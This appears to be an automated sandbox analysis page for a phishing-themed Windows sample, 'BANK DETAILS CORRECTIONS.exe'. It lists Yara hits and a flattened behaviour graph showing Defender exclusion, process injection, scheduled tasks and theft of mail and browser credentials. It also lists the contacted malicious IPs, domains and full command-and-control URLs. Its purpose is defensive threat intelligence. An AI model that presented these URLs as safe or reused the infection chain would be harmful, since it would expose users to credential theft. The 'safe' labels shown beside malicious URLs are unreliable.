Source: Yara match File source: 13.2.fcLfLlfpmjf.exe.28a731c.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BANK DETAILS CORRECTIONS.exe.2dd733c.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BANK DETAILS CORRECTIONS.exe.5a00000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BANK DETAILS CORRECTIONS.exe.5a00000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BANK DETAILS CORRECTIONS.exe.2dd733c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1302494818.0000000005A00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.1361939859.0000000002881000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1295194192.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1411001 Sample: BANK DETAILS CORRECTIONS.exe Startdate: 18/03/2024 Architecture: WINDOWS Score: 100 64 www.nikazo.xyz 2->64 66 xiaoyue.zhuangkou.com 2->66 68 19 other IPs or domains 2->68 72 Snort IDS alert for network traffic 2->72 74 Malicious sample detected (through community Yara rule) 2->74 76 Antivirus detection for URL or domain 2->76 80 11 other signatures 2->80 10 BANK DETAILS CORRECTIONS.exe 7 2->10         started        14 fcLfLlfpmjf.exe 5 2->14         started        signatures3 78 Performs DNS queries to domains with low reputation 64->78 process4 file5 54 C:\Users\user\AppData\...\fcLfLlfpmjf.exe, PE32 10->54 dropped 56 C:\Users\user\AppData\Local\...\tmpB1A6.tmp, XML 10->56 dropped 84 Adds a directory exclusion to Windows Defender 10->84 86 Injects a PE file into a foreign processes 10->86 16 BANK DETAILS CORRECTIONS.exe 10->16         started        19 powershell.exe 23 10->19         started        21 powershell.exe 23 10->21         started        23 schtasks.exe 1 10->23         started        88 Multi AV Scanner detection for dropped file 14->88 90 Machine Learning detection for dropped file 14->90 25 fcLfLlfpmjf.exe 14->25         started        27 schtasks.exe 1 14->27         started        signatures6 process7 signatures8 70 Maps a DLL or memory area into another process 16->70 29 EnKifmZDGZ.exe 16->29 injected 31 WmiPrvSE.exe 19->31         started        33 conhost.exe 19->33         started        35 conhost.exe 21->35         started        37 conhost.exe 23->37         started        39 EnKifmZDGZ.exe 25->39 injected 42 conhost.exe 27->42         started        process9 signatures10 44 sdiagnhost.exe 13 29->44         started        82 Maps a DLL or memory area into another process 39->82 47 sdiagnhost.exe 39->47         started        process11 signatures12 92 Tries to steal Mail credentials (via file / registry access) 44->92 94 Tries to harvest and steal browser information (history, passwords, etc) 44->94 96 Writes to foreign memory regions 44->96 98 3 other signatures 44->98 49 EnKifmZDGZ.exe 44->49 injected 52 firefox.exe 44->52         started        process13 dnsIp14 58 www.mgn.icu 49.0.230.183, 49733, 49734, 49735 YOKOUNANET-MN-AS-APYOKOZUNANETLLCMN Mongolia 49->58 60 xiaoyue.zhuangkou.com 47.76.88.64, 49716, 49717, 49718 VODAFONE-TRANSIT-ASVodafoneNZLtdNZ United States 49->60 62 12 other IPs or domains 49->62
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
192.64.119.184
 www.605alibahis.com United States
22612 NAMECHEAP-NETUS true
87.236.19.107
 www.pro-ecoproduct.com Russian Federation
198610 BEGET-ASRU true
66.29.152.141
 www.nikazo.xyz United States
19538 ADVANTAGECOMUS true
103.197.25.241
 dxgsf.shop Hong Kong
55933 CLOUDIE-AS-APCloudieLimitedHK true
64.190.62.22
 www.hondamechanic.today United States
11696 NBS11696US true
47.76.88.64
 xiaoyue.zhuangkou.com United States
9500 VODAFONE-TRANSIT-ASVodafoneNZLtdNZ true
144.76.75.181
 appmystartup.com Germany
24940 HETZNER-ASDE true
104.21.63.135
 www.oc7o0.top United States
13335 CLOUDFLARENETUS true
49.0.230.183
 www.mgn.icu Mongolia
38818 YOKOUNANET-MN-AS-APYOKOZUNANETLLCMN true
50.6.160.34
 syscomputerrd.info United States
46606 UNIFIEDLAYER-AS-1US true
149.88.64.51
 vhs.zhaxiyun.com United States
188 SAIC-ASUS true
208.91.197.132
 www.roblesprats.com Virgin Islands (BRITISH)
40034 CONFLUENCE-NETWORK-INCVG false
154.7.21.55
 www.supportstuiwords.com United States
174 COGENT-174US true
89.31.143.90
 www.le-kuk.shop Germany
15598 QSC-AG-IPXDE true

Contacted Domains

Name IP Active
www.nikazo.xyz 66.29.152.141 true
www.hondamechanic.today 64.190.62.22 true
dxgsf.shop 103.197.25.241 true
xiaoyue.zhuangkou.com 47.76.88.64 true
www.oc7o0.top 104.21.63.135 true
www.mgn.icu 49.0.230.183 true
vhs.zhaxiyun.com 149.88.64.51 true
www.supportstuiwords.com 154.7.21.55 true
www.605alibahis.com 192.64.119.184 true
www.le-kuk.shop 89.31.143.90 true
www.pro-ecoproduct.com 87.236.19.107 true
syscomputerrd.info 50.6.160.34 true
www.roblesprats.com 208.91.197.132 true
appmystartup.com 144.76.75.181 true
www.agroamsterdam.com unknown unknown
www.syscomputerrd.info unknown unknown
www.d4ffo73dz.sbs unknown unknown
www.dxgsf.shop unknown unknown
www.appmystartup.com unknown unknown
www.cqyh.one unknown unknown
www.betful.site unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.hondamechanic.today/e6xn/?bvOt=u61FFSswTsQwZHK5Df1sdB0Y128x+tID5YHOMFlYU8e6X6f1CT0d10xaq3wUYzHCl9vsukjaIczYmr5kws9YFzoUz2fAyAt1utXToSD7Y3kRqMygPw==&CVZ=R6q4lTVpfZfT_D true
  • Avira URL Cloud: safe
 unknown
http://www.hondamechanic.today/e6xn/ true
  • Avira URL Cloud: safe
 unknown
http://www.oc7o0.top/e6xn/ true
  • Avira URL Cloud: safe
 unknown
http://www.pro-ecoproduct.com/e6xn/?bvOt=qjLanAtLSG+g6YhcGMXKobFEDsC37gbqnajlfmukJF4TH11e5HWV02203YM0+S2fdiE5dYRNrz4LXrhHAApVOWSTzQMTxIdRoLo0SBW6YGOyo1TtwQ==&CVZ=R6q4lTVpfZfT_D true
  • Avira URL Cloud: safe
 unknown
http://www.mgn.icu/e6xn/?bvOt=nPkHDMcb1JQH2fM03fg+aIDrHSSiblzQLJDfzfVFS5dXE5xkefwXFeSdKwFU7agvUteWFQW2j0bTvqR9HNEHAhnYAdzU3M7ag8PlDKnWcqNy6jrKrg==&CVZ=R6q4lTVpfZfT_D true
  • Avira URL Cloud: safe
 unknown
http://www.supportstuiwords.com/e6xn/?bvOt=kzp/a47TZoeooijf6PAMz/PnwNMdJTtRUuOJK4qo3trrvBMD8vtq5KxCd9qMSTo59iVH98TL2IBESMiQybod0ACy6WBPglHFi3698tluOY189mrwzA==&CVZ=R6q4lTVpfZfT_D true
  • Avira URL Cloud: safe
 unknown
http://www.605alibahis.com/e6xn/ true
  • Avira URL Cloud: safe
 unknown
http://www.cqyh.one/e6xn/?bvOt=ptLjcD60OGLEAEKwUIEQaugGR9tSXE/bjIUNt3iL6Qw6jfpYmMXFU+LQzVNpETLyO7HgKKKoK0NH56hBGNACCL/xDZHnLmeKZtapvr1OSuWcevHuIw==&CVZ=R6q4lTVpfZfT_D true
  • Avira URL Cloud: safe
 unknown
http://www.d4ffo73dz.sbs/e6xn/?bvOt=CBgiEcAQTvmtp6KW0R4Z7j3tS9oH+Sd4wWgtDPe8rtmYg/trD2DMciPVEqfGjRspk89YWIqewcapqz5yHVGzQ5KlflxjVuoMuuz+sMTok+5fFnqu2w==&CVZ=R6q4lTVpfZfT_D true
  • Avira URL Cloud: safe
 unknown
http://www.dxgsf.shop/e6xn/ true
  • Avira URL Cloud: safe
 unknown
http://www.supportstuiwords.com/e6xn/ true
  • Avira URL Cloud: safe
 unknown
http://www.605alibahis.com/e6xn/?bvOt=agiyDRT46qDSSmihlQ4LWL8xIgO+qfSg1vPRp09QaQzBVRWpSaW3tusYt1FhFwISNvV57xmnsnPpxHCL/G4hmICdRu2qyIf5a9CtW3wt0Qkcp+tj5w==&CVZ=R6q4lTVpfZfT_D true
  • Avira URL Cloud: safe
 unknown
http://www.nikazo.xyz/e6xn/ true
  • Avira URL Cloud: phishing
 unknown
http://www.appmystartup.com/e6xn/?bvOt=9Ok63Zp3UlyeFJncTpLan6F7UfPHzm35fZEpdutLQ03GKmXAn6TmeK19kU+o3seWSyf9rIWEGfMs+8v+auRJ5uWoro43dFLf6YZQGlVbKlE3Xt0YSA==&CVZ=R6q4lTVpfZfT_D true
  • Avira URL Cloud: safe
 unknown
http://www.oc7o0.top/e6xn/?bvOt=2Kfb+Brrh9GrmqPqLtRK/jRr6sBFjt1I8ubTlYZTytp88LF+iTgF/zqvnUYpIzG87louehFzf7+JPcLVzBlhDb38gBs1IrPZ/tUzM/hN1wjivuIhpg==&CVZ=R6q4lTVpfZfT_D true
  • Avira URL Cloud: safe
 unknown